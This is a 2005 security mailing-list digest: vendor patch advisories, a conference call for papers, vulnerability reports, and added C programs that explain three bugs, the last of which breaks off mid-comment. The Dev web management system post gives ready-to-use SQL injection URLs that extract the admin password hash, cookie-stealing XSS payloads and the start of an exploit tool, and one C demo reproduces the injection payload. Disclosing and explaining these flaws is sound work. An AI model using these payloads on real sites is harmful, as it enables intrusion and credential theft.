MDKSA-2005:236 - Updated fetchmail packages fix vulnerability

2005-12-27 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:236
 http://www.mandriva.com/security/
 ___
 
 Package : fetchmail
 Date: December 23, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Fetchmail before 6.3.1 and before 6.2.5.5, when configured for
 multidrop mode, allows remote attackers to cause a DoS (application
 crash) by sending messages without headers from upstream mail
 servers.
 
 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-4348
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 9c8726e3d841d87b9cc64a9ce3497021  10.1/RPMS/fetchmail-6.2.5-5.3.101mdk.i586.rpm
 83258675518c03144515f89ae8c78be4  10.1/RPMS/fetchmailconf-6.2.5-5.3.101mdk.i586.rpm
 321a0d1e90bbe0fdb128b96a42ff8e20  10.1/RPMS/fetchmail-daemon-6.2.5-5.3.101mdk.i586.rpm
 fbfde9ae3b5d9e343282d48b1f1053c8  10.1/SRPMS/fetchmail-6.2.5-5.3.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 ff6fb1245bcf6edf9247ad71669d4c46  x86_64/10.1/RPMS/fetchmail-6.2.5-5.3.101mdk.x86_64.rpm
 efb6b95e1ff2c7723460b9c1ac7e4200  x86_64/10.1/RPMS/fetchmailconf-6.2.5-5.3.101mdk.x86_64.rpm
 31c794fae961246e263db99fca4308eb  x86_64/10.1/RPMS/fetchmail-daemon-6.2.5-5.3.101mdk.x86_64.rpm
 fbfde9ae3b5d9e343282d48b1f1053c8  x86_64/10.1/SRPMS/fetchmail-6.2.5-5.3.101mdk.src.rpm

 Mandriva Linux 10.2:
 49e0f1a245c001f08117e20542119796  10.2/RPMS/fetchmail-6.2.5-10.4.102mdk.i586.rpm
 c8d3515770d91ff96190e6e10c400169  10.2/RPMS/fetchmailconf-6.2.5-10.4.102mdk.i586.rpm
 34feb39cc4766bdb9e15df201d085ed0  10.2/RPMS/fetchmail-daemon-6.2.5-10.4.102mdk.i586.rpm
 fbf579f130896de2c645a8460dd88862  10.2/SRPMS/fetchmail-6.2.5-10.4.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 489f797385cc55c378a3faf50faa898e  x86_64/10.2/RPMS/fetchmail-6.2.5-10.4.102mdk.x86_64.rpm
 d6c123681c17748de5f17c2399fdb7c4  x86_64/10.2/RPMS/fetchmailconf-6.2.5-10.4.102mdk.x86_64.rpm
 9e6b77b062ab162d4c215032dc7714f3  x86_64/10.2/RPMS/fetchmail-daemon-6.2.5-10.4.102mdk.x86_64.rpm
 fbf579f130896de2c645a8460dd88862  x86_64/10.2/SRPMS/fetchmail-6.2.5-10.4.102mdk.src.rpm

 Mandriva Linux 2006.0:
 e09c0856591976733a1bc8041e8eb93c  2006.0/RPMS/fetchmail-6.2.5-11.2.20060mdk.i586.rpm
 aba5a8c643b15149976c30ba6540  2006.0/RPMS/fetchmailconf-6.2.5-11.2.20060mdk.i586.rpm
 d683b66431939e6106b3fee6b8b500f5  2006.0/RPMS/fetchmail-daemon-6.2.5-11.2.20060mdk.i586.rpm
 bb8c5a81a1299a855594849851615d17  2006.0/SRPMS/fetchmail-6.2.5-11.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 2567bef9f4fc2b8d91fae1e5539d5920  x86_64/2006.0/RPMS/fetchmail-6.2.5-11.2.20060mdk.x86_64.rpm
 33a88c8055504ab5c741be8c84ab1a81  x86_64/2006.0/RPMS/fetchmailconf-6.2.5-11.2.20060mdk.x86_64.rpm
 b2e430f97aed6f30e18144ee57b17b8f  x86_64/2006.0/RPMS/fetchmail-daemon-6.2.5-11.2.20060mdk.x86_64.rpm
 bb8c5a81a1299a855594849851615d17  x86_64/2006.0/SRPMS/fetchmail-6.2.5-11.2.20060mdk.src.rpm

 Corporate 3.0:
 51c54e861eec7692a76b3f5b91bab4b9  corporate/3.0/RPMS/fetchmail-6.2.5-3.3.C30mdk.i586.rpm
 41c74970c74af1fce8eae213f60d108e  corporate/3.0/RPMS/fetchmailconf-6.2.5-3.3.C30mdk.i586.rpm
 53fe277159d6771d83d40c99c3418f51  corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.3.C30mdk.i586.rpm
 477f8ec8d7ccaba94a529fd4ead38f11  corporate/3.0/SRPMS/fetchmail-6.2.5-3.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 7f806d8e2858a008799f0766503f0c7a  x86_64/corporate/3.0/RPMS/fetchmail-6.2.5-3.3.C30mdk.x86_64.rpm
 cb3793ad31fb347d9daf894d7ec7d318  x86_64/corporate/3.0/RPMS/fetchmailconf-6.2.5-3.3.C30mdk.x86_64.rpm
 8030300459d198b72b9e9a83909fc0fb  x86_64/corporate/3.0/RPMS/fetchmail-daemon-6.2.5-3.3.C30mdk.x86_64.rpm
 477f8ec8d7ccaba94a529fd4ead38f11  x86_64/corporate/3.0/SRPMS/fetchmail-6.2.5-3.3.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: 

MDKSA-2005:237 - Updated cpio packages fix buffer overflow on x86_64

2005-12-27 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:237
 http://www.mandriva.com/security/
 ___
 
 Package : cpio
 Date: December 23, 2005
 Affected: 10.2, 2006.0
 ___
 
 Problem Description:
 
 A buffer overflow in cpio 2.6 on 64-bit platforms could allow a local
 user to create a DoS (crash) and possibly execute arbitrary code when
 creating a cpio archive with a file whose size is represented by more
 than 8 digits.
 
 The updated packages have been patched to correct these problems.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4268
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 b0400cb8878a93cc4e4d4326a0a46641  10.2/RPMS/cpio-2.6-3.3.102mdk.i586.rpm
 ad70b46181e5a9ae2ca7ed97bb2c3853  10.2/SRPMS/cpio-2.6-3.3.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 0a7ca9d0d1de932219a76dcee4195ff8  x86_64/10.2/RPMS/cpio-2.6-3.3.102mdk.x86_64.rpm
 ad70b46181e5a9ae2ca7ed97bb2c3853  x86_64/10.2/SRPMS/cpio-2.6-3.3.102mdk.src.rpm

 Mandriva Linux 2006.0:
 571d79d56efac2687713e63180f10049  2006.0/RPMS/cpio-2.6-5.1.20060mdk.i586.rpm
 998e92b468e495d779efd10daacae3ad  2006.0/SRPMS/cpio-2.6-5.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 0bd4e5c9d85826c706232e21d3393317  x86_64/2006.0/RPMS/cpio-2.6-5.1.20060mdk.x86_64.rpm
 998e92b468e495d779efd10daacae3ad  x86_64/2006.0/SRPMS/cpio-2.6-5.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDrHPemqjQ0CJFipgRApCrAJ40iYNwqiNcgLiIrd5zh3tbuAkFSACgpiZ3
tD9IdCprIvkMOdpAqBAkdzU=
=UtT3
-END PGP SIGNATURE-
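
The advisory names the bug class (a file size that needs more than 8 digits overflowing a header field on 64-bit platforms) but not the mechanics. The C program below is an added illustration, not cpio's own code: it writes a 64-bit file size into a fixed 8-digit octal header field, first with the unchecked format-then-copy pattern that overruns the field as soon as the size needs more than 8 digits, then with a digit-count check that refuses such sizes. The header layout, offsets and function names are hypothetical; the field kept inside one flat buffer is what lets the overrun be observed without crashing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Illustrative flat header (hypothetical offsets, not cpio's real layout):
 * 6-byte magic, an 8-digit octal size field, and the file name right
 * behind it. */
#define HDR_SIZE_OFF  6
#define HDR_SIZE_LEN  8
#define HDR_NAME_OFF  (HDR_SIZE_OFF + HDR_SIZE_LEN)
#define HDR_LEN       80

typedef struct { char raw[HDR_LEN]; } header_t;

static void init_header(header_t *h, const char *name)
{
    memset(h->raw, 0, HDR_LEN);
    memcpy(h->raw, "070707", 6);
    snprintf(h->raw + HDR_NAME_OFF, HDR_LEN - HDR_NAME_OFF, "%s", name);
}

static const char *header_name(const header_t *h)
{
    return h->raw + HDR_NAME_OFF;
}

/* Octal digits needed to print v (at least 1).  A 64-bit file size can
 * need up to 22, which is the condition the advisory describes. */
static int octal_digits(uint64_t v)
{
    int n = 1;
    while (v >>= 3)
        n++;
    return n;
}

/* Vulnerable pattern: format first, then copy every digit produced.
 * "%08llo" pads short values to 8 digits but never truncates long ones,
 * so when the size needs more than 8 digits the surplus bytes run into
 * whatever follows the field (here: the file name). */
static void write_size_unchecked(header_t *h, uint64_t size)
{
    char tmp[32];
    int n = sprintf(tmp, "%08llo", (unsigned long long)size);
    for (int i = 0; i < n; i++)          /* n may exceed HDR_SIZE_LEN */
        h->raw[HDR_SIZE_OFF + i] = tmp[i];
}

/* Hardened: compare the digit count with the field width before touching
 * the header.  Returns 0 on success, -1 if the size does not fit. */
static int write_size_checked(header_t *h, uint64_t size)
{
    char tmp[32];
    if (octal_digits(size) > HDR_SIZE_LEN)
        return -1;
    snprintf(tmp, sizeof tmp, "%0*llo", HDR_SIZE_LEN, (unsigned long long)size);
    memcpy(h->raw + HDR_SIZE_OFF, tmp, HDR_SIZE_LEN);
    return 0;
}

/* 1 if the unchecked writer corrupted the name that follows the field. */
static int name_clobbered(uint64_t size)
{
    header_t h;
    init_header(&h, "file.txt");
    write_size_unchecked(&h, size);
    return strcmp(header_name(&h), "file.txt") != 0;
}

/* 1 if the checked writer accepted `size` and stored exactly `expect`,
 * 0 if it refused and left the header untouched, -1 otherwise. */
static int checked_outcome(uint64_t size, const char *expect)
{
    header_t h;
    init_header(&h, "file.txt");
    int rc = write_size_checked(&h, size);
    int name_ok = strcmp(header_name(&h), "file.txt") == 0;
    if (rc == 0 && name_ok && memcmp(h.raw + HDR_SIZE_OFF, expect, HDR_SIZE_LEN) == 0)
        return 1;
    if (rc == -1 && name_ok && h.raw[HDR_SIZE_OFF] == '\0')
        return 0;
    return -1;
}

int main(void)
{
    uint64_t big = (uint64_t)1 << 40;     /* 1 TiB: 14 octal digits */
    printf("4096 bytes needs %d digits, 1 TiB needs %d\n",
           octal_digits(4096), octal_digits(big));
    printf("unchecked writer clobbers the name for 1 TiB: %d\n", name_clobbered(big));
    printf("checked writer refuses 1 TiB: %d\n", checked_outcome(big, "") == 0);
    return 0;
}
```

The checked writer refuses rather than truncates: silently storing a wrong size would corrupt every archive member that follows, which is a different bug but still one an attacker-controlled file could trigger.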


Dev web management system <= 1.5 SQL injection / cross site scripting

2005-12-27 Thread retrogod
 Dev web management system <= 1.5 SQL injection / cross site scripting -

software:
site: http://dev-wms.sourceforge.net/
description: "Dev is powerful and very flexible content management
  system for web portals[..]"
---

vulnerabilities:

i) in openforum.php at line 19:

...
$miestnost=mysql_fetch_array(mysql_query("SELECT id, nazov, editorid FROM 
forum1cat WHERE id=$cat",$spojenie));
...

The "cat" argument is not properly sanitized before being passed to a query,
so you can inject SQL statements regardless of the magic_quotes_gpc setting. PoC:

http://[target]/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)

now you have the site administration MD5 password hash on screen...

ii) in getfile.php:

...
include_once ("./register_globals.php");
if (!$cat) die ("Access denied");
include "admin/_dbase.conf.php";
$spojenie=mysql_pconnect 
($conf_mysql_server,$conf_mysql_user_name,$conf_mysql_password);
mysql_select_DB ($conf_mysql_database_name);
include "class_configuration.php";
$configuration->ConfLoadDBtoPHP();
include "admin/_config.php";

echo "SELECT icon, icontype FROM prispevok1cat WHERE cat LIKE '$cat' LIMIT 1";
$image=mysql_fetch_array(mysql_query("SELECT icon, icontype FROM prispevok1cat 
WHERE cat LIKE '$cat' LIMIT 1", $spojenie));
if ($image) {
 header ("Content-type: $image[icontype]");
 echo $image[icon];
} else {
 echo "Image not found";
}
...

if magic_quotes_gpc is off, same results with:

http://[target]/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*

iii)
also we have SQL injection (hard to exploit?) in download_now.php at lines
31-33:
...
$out=mysql_fetch_array(mysql_query("SELECT Count(id) FROM downloadmanager WHERE 
id = ".$target,$spojenie));
if ($out[0]==1) {
 $out2 = mysql_fetch_array(mysql_query("SELECT * FROM downloadmanager 
WHERE id = $target",$spojenie));
...

http://[target]/[path]/download_now.php?target=9[SQL]

iv) xss:

http://[target]/[path]/add.php?language[ENTER_ARTICLE_TITLE]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[SPECIFY_ZONE]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[ENTER_ARTICLE_HEADER]=";);}}-->alert(document.cookie)
http://[target]/[path]/add.php?language[ENTER_ARTICLE_BODY]=";);}}-->alert(document.cookie)

this is the tool for i) & ii):

#  http://rgod.altervista.org  #
#  #
#  -> this works regardless of magic_quotes_gpc setting#
#  usage: launch from Apache, fill in requested fields, then go!   #
#  #
#  Sun-Tzu: "Prohibit the taking of omens, and do away with  superstitious #
#  doubts. Then, until death itself comes, no calamity need be feared."#

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);

echo'* Dev <=1.5 \'cat\' SQL injection **

 body {background-color:#11;   SCROLLBAR-ARROW-COLOR:
#ff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FF   !important}  input  {background-color:#303030
!important} option {  background-color:   #303030   !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}checkbox
{background-color: #303030 !important} select {font-weight: normal;   color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt   !important;
background-color:   #11;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em!important} h3 {font-size: 0.8em
!important} h4,h5,h6{font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .S
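
Why the PoC for i) works with magic_quotes_gpc on: $cat is interpolated into a numeric context (WHERE id=$cat), so the payload needs no quote characters at all, and CHAR(...) spells the string literal 'admin_password' without one. The C program below is an added example, not part of retrogod's post and not Dev's code: it rebuilds that query in C (the SQL is transcribed from openforum.php, the function names are mine), emulates magic_quotes_gpc, shows the PoC value passing through it unchanged, and contrasts a strict-integer check that rejects it. The PoC value is the advisory's, URL-decoded.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Emulates magic_quotes_gpc: backslash-escapes ' " and \ in `in`.
 * Returns the escaped length. */
static size_t add_slashes(char *out, size_t outlen, const char *in)
{
    size_t o = 0;
    for (; *in != '\0' && o + 2 < outlen; in++) {
        if (*in == '\'' || *in == '"' || *in == '\\')
            out[o++] = '\\';
        out[o++] = *in;
    }
    out[o] = '\0';
    return o;
}

/* The openforum.php pattern transcribed to C: `cat` lands in a numeric
 * context with no surrounding quotes, so quote-escaping changes nothing.
 * Returns 0 on success, -1 if the buffer is too small. */
static int build_query_unsafe(char *q, size_t qlen, const char *cat)
{
    int n = snprintf(q, qlen,
                     "SELECT id, nazov, editorid FROM forum1cat WHERE id=%s", cat);
    return (n < 0 || (size_t)n >= qlen) ? -1 : 0;
}

/* Accepts only a canonical decimal integer: optional sign, digits, and
 * nothing else (no leading whitespace, no trailing text, no overflow).
 * Returns 0 and sets *out on success, -1 otherwise. */
static int parse_strict_int(const char *s, long *out)
{
    char *end;
    if (s == NULL || *s == '\0' || isspace((unsigned char)*s))
        return -1;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;
    *out = v;
    return 0;
}

/* Hardened: the literal is rebuilt from the parsed value, so no client
 * byte reaches the statement.  (Parameterised queries are the general
 * fix; this is the minimal one for an integer id.) */
static int build_query_safe(char *q, size_t qlen, const char *cat)
{
    long id;
    if (parse_strict_int(cat, &id) != 0)
        return -1;
    int n = snprintf(q, qlen,
                     "SELECT id, nazov, editorid FROM forum1cat WHERE id=%ld", id);
    return (n < 0 || (size_t)n >= qlen) ? -1 : 0;
}

/* Decodes a MySQL CHAR(n,n,...) literal into `out`: this is how the PoC
 * spells admin_password without a single quote character.  Returns the
 * decoded length, or -1 on malformed input. */
static int decode_mysql_char(const char *lit, char *out, size_t outlen)
{
    const char *p = lit;
    size_t o = 0;
    if (strncmp(p, "CHAR(", 5) != 0)
        return -1;
    for (p += 5; *p != '\0' && *p != ')'; ) {
        char *end;
        long v = strtol(p, &end, 10);
        if (end == p || v < 0 || v > 255 || o + 1 >= outlen)
            return -1;
        out[o++] = (char)v;
        p = end;
        if (*p == ',')
            p++;
    }
    if (*p != ')')
        return -1;
    out[o] = '\0';
    return (int)o;
}

/* The PoC's `cat` value from the advisory, URL-decoded. */
static const char POC_CAT[] =
    "-1 UNION SELECT value,value,value FROM variables1 WHERE "
    "name=CHAR(97,100,109,105,110,95,112,97,115,115,119,111,114,100)";

int main(void)
{
    char esc[256], q[512], name[64];
    add_slashes(esc, sizeof esc, POC_CAT);
    printf("magic_quotes altered the payload: %s\n", strcmp(esc, POC_CAT) ? "yes" : "no");
    build_query_unsafe(q, sizeof q, esc);
    printf("unsafe: %s\n", q);
    printf("safe rejects payload: %d\n", build_query_safe(q, sizeof q, esc) == -1);
    decode_mysql_char(strstr(POC_CAT, "CHAR("), name, sizeof name);
    printf("CHAR(...) decodes to: %s\n", name);
    return 0;
}
```

The getfile.php case (ii) is the string-context variant: there the value sits inside LIKE '...', so magic_quotes_gpc does block the quote the payload needs, which is why the post notes it only works with the setting off. Type validation as above fixes (i) and (iii); (ii) needs proper escaping or a bound parameter.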

CFP - IT Underground 2006, Prague, Czech Republic

2005-12-27 Thread Piotr Sobolewski
Dear Bugtraq readers,

I'd like to announce the call for papers for IT Underground 2006, a 
two-day conference organized by Software Conferences and the hakin9.lab team on 
23-24 February 2006 in Prague, Czech Republic. 

IT Underground 2006 is the fifth edition of a conference dedicated to IT 
security issues, where remarkable authorities will share their knowledge and 
experience with IT specialists. 

In previous editions we had the pleasure of listening to: Ofir Arkin, Maximillian 
Dornseif, David h1kari Hulton, Chuck Willis, Charl Van der Walt, Shalom 
Carmel, Martin Herfurt, Adam Laurie, Marcel Holtmann, Alexander Kornbrust, 
Saumil Udayan Shah, Robert Lee Ayers, Dave Aitel, Stefano Zanero, Thorsten 
Holz, Joanna Rutkowska, Michael Shema, Piotr Sobolewski, Michal Szymanski, 
Paul Wouters, Rakan El-Khalil, Wojciech Dworakowski, K.K. Mookhey, Pawel 
Krawczyk. 

The deadline for lecture proposals is the 15th of January, 2006.

You can find all the detailed information at http://www.itUnderground.org/ 

We hope that you find our offer interesting. Please contact me to discuss 
further details of our cooperation. 

IT Underground 2006 - basic characteristics. 

When: 23-24 February 2006
Where: Prague, Czech Republic 
Topic: IT Security

We assure: 
- hotel accommodation and transfer, 
- full support for your presentation, both before and during the conference, 
- providing the necessary technical facilities for the presentation, 
- assistance in acquiring and publishing presentation materials, information 
about your lecture in the conference brochure, 
- supervising and directing the overall progress of the conference.

-- 
Piotr Sobolewski
[EMAIL PROTECTED]




Found new bug

2005-12-27 Thread hackeriri
In GOD We Trust
  Kachal667 Under9round Team (KuT)
Hi,
Here's my (LrK) new advisory about PHP websites.

PHP System - Input Data(simple XSS) vulnerabilities
Date: 02/11/2005

Summary
---

PHP is a programming language and it is a very good language for portal 
programming.
We see some portals with PHP like:
PHPBB , PHPNuke and 


Details
---

If the programmer is not professional, he will probably make a mistake,
if he doesn't stop some tags like:
alert(document.cookie)
http://eg.com/deface.htm>

To fix it you should write simple code for stopping iframe or script or ...

http://www.PHP.com


Lone Rider Knight





Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure

2005-12-27 Thread contact . removethis
Airscanner Mobile Security Advisory #05083101:
Spb Kiosk Engine Administrator Password & Information Disclosure (Local)

Product:
Kiosk Engine 1.0.0.1

Platform:
Tested on Windows Mobile Pocket PC 2003

Requirements:
Mobile device running Windows Mobile Pocket PC with Kiosk Engine 1.0.0.1 
installed

Credits:
Seth Fogie
Airscanner Mobile Security
http://www.airscanner.com
Mobile Antivirus Researchers Association
http://www.mobileav.org
August 30 2005

Risk Level:
Medium. Local attacker gains unauthorized control over device.

Summary:
Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In 
this mode, the target applications are the only ones that can be used on a 
specific Pocket PC device.

Details:
Kiosk Engine allows an administrator to enter their passcode to gain full 
control over a PDA with the Kiosk Engine installed. This passcode is stored in 
the registry as plaintext and can be obtained several different ways (e.g. 
remote registry access).

Workaround:
None

Vendor Response
Waiting response.

Online Advisory: 
http://www.airscanner.com/security/05083101_kioskpass.htm

Copyright (c) 2005 Airscanner Corp.

Permission is granted for the redistribution of this alert electronically. It 
may not be edited in any way without the express written consent of Airscanner 
Corp. If you wish to reprint the whole or any part of this alert in any other 
medium other than electronically, please contact Airscanner Corp. for 
permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use on an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.



[SECURITY] [DSA 928-1] New dhis-tools-dns packages fix insecure temporary file creation

2005-12-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 928-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
December 27th, 2005 http://www.debian.org/security/faq
- --

Package: dhis-tools-dns
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE ID : CVE-2005-3341

Javier Fernández-Sanguino Peña from the Debian Security Audit project
discovered that two scripts in the dhis-tools-dns package, DNS
configuration utilities for a Dynamic Host Information System, which
are usually executed by root, create temporary files in an insecure
fashion.

The old stable distribution (woody) does not contain a dhis-tools-dns
package.

For the stable distribution (sarge) these problems have been fixed in
version 5.0-3sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 5.0-5.

We recommend that you upgrade your dhis-tools-dns package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1.dsc
  Size/MD5 checksum:  623 b5bb7245baec1eaea19bca6fed93a20d

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1.diff.gz
  Size/MD5 checksum: 4711 d2095bb5dbd01ad45eac91f17aa71dfa

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0.orig.tar.gz
  Size/MD5 checksum: 3535 9674e661082ad955010efd6d06686b82

  Alpha architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_alpha.deb
  Size/MD5 checksum: 7978 207fa0d62d5cf58685f7f0db185e08d4

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_alpha.deb
  Size/MD5 checksum: 8678 61934b801e98457666f28fd80e43dd53

  AMD64 architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_amd64.deb
  Size/MD5 checksum: 7592 c98df83e0c69f857ab6d098c4c09ec41

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_amd64.deb
  Size/MD5 checksum: 8090 b6c4401b2cad0e2cb8fef248a783cc48

  ARM architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_arm.deb
  Size/MD5 checksum: 7432 03343675acb57b139d29ce92e0dd7750

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_arm.deb
  Size/MD5 checksum: 7854 d58346c9292b0b5991f83ef3d9dd7a1d

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_i386.deb
  Size/MD5 checksum: 7330 29c880357067715b4ea639804f58ee6a

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_i386.deb
  Size/MD5 checksum: 7632 523f6a69be038c1d8ccb75f5e0cc2da9

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_ia64.deb
  Size/MD5 checksum: 8692 091e101db6ebe1088b9f204611d6d20d

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_ia64.deb
  Size/MD5 checksum: 9396 3e1d7ed7784f23c2d1437a6c0e935287

  HP Precision architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_hppa.deb
  Size/MD5 checksum: 8106 40ffc96aa7b1bdbdf075a45ff4a020ca

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_hppa.deb
  Size/MD5 checksum: 8666 528294b6c32e7d694d7f5336294fccae

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_m68k.deb
  Size/MD5 checksum: 7352 6c552aa90253a73c05203cc23fc08a49

http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-genkeys_5.0-3sarge1_m68k.deb
  Size/MD5 checksum: 7774 6f56252d7552d86f1c26e61efe497b79

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/d/dhis-tools-dns/dhis-tools-dns_5.0-3sarge1_mips.deb
  Size/MD5 checksum: 8292 5874
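
What "create temporary files in an insecure fashion" means in practice, as an added C example (the dhis-tools-dns scripts are not reproduced on this page, and the file name used here is hypothetical): a predictable name under a shared directory that an attacker pre-links to a file of their choosing before the root-run script gets there. A plain truncating fopen() follows the link and writes the attacker's target; O_CREAT|O_EXCL refuses the pre-existing link; mkstemp(), or mktemp(1) in a shell script, avoids the predictable name altogether. The program stages the race in a private directory it creates and removes itself.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Stages the scene in a private directory: the script's predictable
 * temporary name already exists as a symlink planted by the attacker and
 * points at the file the attacker wants written.  Returns 0 on success. */
static int setup_scene(char *dir, char *pred, char *victim, size_t len)
{
    char tmpl[] = "/tmp/insecure-tmp-demo-XXXXXX";
    if (mkdtemp(tmpl) == NULL) {                 /* fall back to cwd */
        strcpy(tmpl, "./insecure-tmp-demo-XXXXXX");
        if (mkdtemp(tmpl) == NULL)
            return -1;
    }
    snprintf(dir, len, "%s", tmpl);
    snprintf(pred, len, "%s/dhis-tool.tmp", tmpl);   /* hypothetical name */
    snprintf(victim, len, "%s/victim", tmpl);
    return symlink(victim, pred);
}

/* Insecure pattern: predictable name, plain truncating open.  fopen()
 * follows the planted link, so the data lands in `victim`.  Returns 1
 * when that happened. */
static int unsafe_tempfile(const char *pred, const char *victim)
{
    FILE *f = fopen(pred, "w");
    if (f == NULL)
        return 0;
    fputs("data the script meant for its own scratch file\n", f);
    fclose(f);
    struct stat st;
    return stat(victim, &st) == 0 && st.st_size > 0;
}

/* Fix 1: O_CREAT|O_EXCL fails if anything already exists at the path,
 * a symlink included, instead of following it.  Returns 1 if the open
 * was refused with EEXIST. */
static int excl_open(const char *pred)
{
    int fd = open(pred, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0) {
        close(fd);
        return 0;
    }
    return errno == EEXIST;
}

/* Fix 2 (what the scripts should do via mktemp): mkstemp() picks an
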